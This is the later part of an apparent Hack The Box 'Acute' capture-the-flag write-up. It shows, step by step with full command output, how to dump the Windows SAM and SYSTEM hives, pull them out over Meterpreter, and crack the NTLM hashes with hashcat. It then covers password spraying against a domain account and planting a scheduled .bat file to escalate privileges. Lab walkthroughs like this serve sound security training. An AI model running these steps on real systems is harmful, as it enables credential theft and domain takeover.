(c) Microsoft Corporation. All rights reserved.

C:\Users\jmorgan\Documents>whoami
whoami
acute\jmorgan

C:\Users\jmorgan\Documents>

27. Get the passwords by dumping the SAM. As a local administrator on Acute-PC01, jmorgan can back up the registry hives:

C:\Users\jmorgan\Documents>cd C:/
cd C:/

C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\> ls
ls


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 07/12/2019 09:14 PerfLogs
d-r--- 06/12/2021 11:06 Program Files
d-r--- 07/12/2021 12:43 Program Files (x86)
d-r--- 21/12/2021 22:50 Users
d----- 16/04/2024 15:49 Utils
d----- 16/12/2021 01:23 Windows


PS C:\> cd Utils
cd Utils
PS C:\Utils> ls
ls


Directory: C:\Utils


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/04/2024 16:33 68608 nc.exe
-a---- 16/04/2024 15:17 770279 PowerView.ps1
-a---- 16/04/2024 15:49 207360 shell.exe
-a---- 16/04/2024 15:28 2387456 winPEASx64.exe


PS C:\Utils>



reg save HKLM\sam sam.bak

reg save HKLM\system sys.bak

PS C:\Utils> reg save HKLM\sam sam.bak
reg save HKLM\sam sam.bak
The operation completed successfully.
PS C:\Utils> reg save HKLM\system sys.bak
reg save HKLM\system sys.bak
The operation completed successfully.
PS C:\Utils> ls
ls


Directory: C:\Utils


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/04/2024 16:33 68608 nc.exe
-a---- 16/04/2024 15:17 770279 PowerView.ps1
-a---- 16/04/2024 16:36 57344 sam.bak
-a---- 16/04/2024 15:49 207360 shell.exe
-a---- 16/04/2024 16:36 12140544 sys.bak
-a---- 16/04/2024 15:28 2387456 winPEASx64.exe


PS C:\Utils>

Then download them through msf


^C
Terminate channel 1? [y/N]
^C
Terminate channel 1? [y/N] y
meterpreter > download sam.bak
[*] Downloading: sam.bak -> /home/kali/Desktop/sam.bak
[*] Downloaded 56.00 KiB of 56.00 KiB (100.0%): sam.bak -> /home/kali/Desktop/sam.bak
[*] Completed : sam.bak -> /home/kali/Desktop/sam.bak
meterpreter > download sys.bak
[*] Downloading: sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 1.00 MiB of 11.58 MiB (8.64%): sys.bak -> /home/kali/Desktop/sys.bak
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > download sys.bak
[*] Downloading: sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 1.00 MiB of 11.58 MiB (8.64%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 2.00 MiB of 11.58 MiB (17.27%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 3.00 MiB of 11.58 MiB (25.91%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 4.00 MiB of 11.58 MiB (34.55%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 5.00 MiB of 11.58 MiB (43.18%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 6.00 MiB of 11.58 MiB (51.82%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 7.00 MiB of 11.58 MiB (60.46%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 8.00 MiB of 11.58 MiB (69.1%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 9.00 MiB of 11.58 MiB (77.73%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 10.00 MiB of 11.58 MiB (86.37%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 11.00 MiB of 11.58 MiB (95.01%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 11.58 MiB of 11.58 MiB (100.0%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Completed : sys.bak -> /home/kali/Desktop/sys.bak
meterpreter >

28. Crack the passwords

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -sam sam.bak -system sys.bak LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x44397c32a634e3d8d8f64bff8c614af7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
[*] Cleaning up...
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 1000 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 5 digests; 4 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

31d6cfe0d16ae931b73c59d7e0c089c0:
a29f7623fd11550def0192de9246f46b:Password@123
Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: ./hash
Time.Started.....: Wed Apr 17 07:30:42 2024 (3 secs)
Time.Estimated...: Wed Apr 17 07:30:45 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5461.1 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 2/4 (50.00%) Digests (total), 2/4 (50.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 42%

Started: Wed Apr 17 07:30:41 2024
Stopped: Wed Apr 17 07:30:46 2024

29. It cracked the empty password for Guest (as expected) and Password@123 for Administrator.

Administrator

Password@123

30. Aha, password reuse? Maybe a domain user reuses this password. Let's spray it against the domain controller from the edavies reverse shell session. On my first try, the domain user awallace worked!

PS C:\Utils> $pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\awallace
PS C:\Utils>

31. Add awallace. Since Lois runs the .bat scripts every five minutes, I'll write a script that adds awallace to Site_Admin:

PS C:\Utils> Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
PS C:\Utils> Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
net group site_admin awallace /add /domain
PS C:\Utils>

32. After waiting a few minutes, I was able to read the flag

PS C:\Utils> Invoke-Command -ScriptBlock { cat \users\administrator\desktop\root.txt  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat \users\administrator\desktop\root.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
9cce45e48fdb55bd12962d4a7b4691bc
PS C:\Utils>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/438


Acute-htb-writeup
https://sh1yan.top/2024/04/16/Acute-htb-writeup/
Author: shiyan
Published: 16 April 2024